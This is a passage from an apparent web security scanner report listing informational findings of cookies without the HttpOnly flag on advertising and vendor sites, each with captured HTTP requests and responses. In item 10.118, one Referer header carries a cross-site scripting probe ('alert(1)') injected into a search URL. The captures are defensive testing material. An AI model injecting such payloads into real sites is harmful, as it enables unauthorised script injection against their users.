Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.109. http://udmserve.net/udm/img.fetch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440343958:2:2900:0:0:63440343958:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Set-Cookie: dt=9b3eab00-120f-460c-84d6-3607c7ca9d48; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:45:58 GMT
Expires: Mon, 05 Sep 2011 12:45:58 GMT
Date: Tue, 06 Sep 2011 12:45:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...

10.110. http://utdi.reachlocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?scid=2323693&kw=233292&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:02 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26kw%3D233292; domain=.reachlocal.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.reachlocal.com; path=/
Location: http://redirect.rtrk.com/redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26rl_key%3D747249abb89e424959a67c34a59e232e%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520225798%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0
Vary: Accept-Encoding
Content-Length: 1036
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://redirect.rtrk.com/redirect?RL_rurl=http:
...[SNIP]...

10.111. http://utdi.reachlocal.net/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309926%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; domain=.reachlocal.net; path=/
Set-Cookie: RlocalPROXY=RLPROXY%3D; domain=.reachlocal.net; path=/
Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d0; domain=.reachlocal.net; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.net; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1; domain=.reachlocal.net; path=/
Location: /index.html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:59 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/index.html">here</a>.</p>
<hr>
<address>Apache
...[SNIP]...

10.112. http://video.music.yahoo.com/up/fop/process/getPlaylistFOP.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.music.yahoo.com
Path:   /up/fop/process/getPlaylistFOP.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /up/fop/process/getPlaylistFOP.php?node_id=v221574941&tech=flash&bitrate=&mode=meta&lg=kKGqmIfiMW0IC76O.Yl4nj&vidH=225&vidW=425&lang=us&tf=fop&eventid=1301797 HTTP/1.1
Host: video.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://d.yimg.com/m/up/fop/embedflv/swf/fop.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: =deleted; expires=Mon, 06-Sep-2010 12:49:41 GMT
Set-Cookie: vmyc=1-0; path=/
Cache-Control: private
Connection: close
Content-Type: text/xml; charset=UTF-8
Content-Length: 2224

<DATA>
<PANEL-SETS></PANEL-SETS>
<CUSTOM-DATA TYPE="MUSIC">
<USER><CLIENT_IP>50.23.123.106</CLIENT_IP><BCOOKIE><![CDATA[invalid]]></BCOOKIE><PROPERTY_UID GUEST="1">0</PROPERTY_UID></USER></CUSTOM-DATA
...[SNIP]...

10.113. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000790042/mnum=0000957105/cstr=62371385=_4e6615c4,2458564453,790042^957105^77^0,1_/xsxdata=$xsxdata/bnum=62371385/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Tue, 06-Mar-2012 13:44:53 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1755

<div id="theme180x150A01H1F0L1P0000V1_1Container"> <style type="text/css" media="screen">                                @import url(http://aranet.vo.llnwd.net/o28/themes/css/theme180x150A01H1F0L1P0000V1_1.css);                            </sty
...[SNIP]...

10.114. http://www.aptela.com/mainstylesheet.css/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /mainstylesheet.css/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mainstylesheet.css/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://support.aptela.com:9000/tools/ResetPassword.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326402; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.8.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:26:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326409; expires=Wed, 05-Sep-2012 12:26:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 15669
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> Pag
...[SNIP]...

10.115. http://www.aptela.com/misc/privacy-policy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /misc/privacy-policy/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /misc/privacy-policy/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; __utma=207344579.967367889.1315327921.1315327921.1315327921.1; __utmc=207344579; __utmz=207344579.1315327921.1.1.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326382; expires=Wed, 05-Sep-2012 12:26:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fmisc%2F404%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2F33c420cd2ee5ef0c134a240a%2FT2V1%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2F33c420cd2c9d489cd0318b99%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:22 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 20963
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title>Privacy Poli
...[SNIP]...

10.116. http://www.aptela.com/my-account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...

10.117. http://www.aptela.com/my-account/login-error/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...

10.118. http://www.burstnet.com/enlightn/8117/3E06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117/3E06/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enlightn/8117/3E06/?01AD=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA&01RI=F72DD362342178E&01NA= HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: TID=174q04v1muc3qi; CMP=1AF.1GYo^19q.1GYo; 56Q8=CT-1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 06 Sep 2011 12:55:53 GMT
Content-Length: 43
Connection: close
Set-Cookie: 56Q8=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA; expires=Tue, 04-Oct-2011 12:55:53 GMT; path=/; domain=.www.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1AF.1GYo^19q.1Gbq; path=/; expires=Thu, 06-Sep-2012 12:55:52 GMT; domain=.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GIF89a.............!.......,...........D..;

10.119. http://www.comcast.com/includes/js/CookieHelper.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /includes/js/CookieHelper.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/CookieHelper.js HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Aug 2011 16:28:54 GMT
Accept-Ranges: bytes
ETag: "0e724edc59cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 11:50:37 GMT
Connection: close
Content-Length: 6348
Set-Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; path=/

function getCookieVal(sName)
{
   var val = "";
   var nIndex = document.cookie.indexOf(sName);
   if (nIndex != -1)
   {
       // move past the equal sign
       var nStart = nIndex + sName.length + 1;
       
       
...[SNIP]...

10.120. http://www.comcast.com/includes/omniture/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /includes/omniture/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/omniture/s_code.js HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 27 May 2011 18:16:50 GMT
Accept-Ranges: bytes
ETag: "055553f9a1ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 11:50:37 GMT
Connection: close
Content-Length: 66775
Set-Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; path=/

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
var s
...[SNIP]...

10.121. https://www.comcast.com/Localization/Localize.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Localization/Localize.cspx?Referer=%2FShop%2FBuyFlow2%2Fproducts.cspx&SourcePage=Bundled&FormName=AddressOrZipCode&StreetName=&AptNumber=&Zip= HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
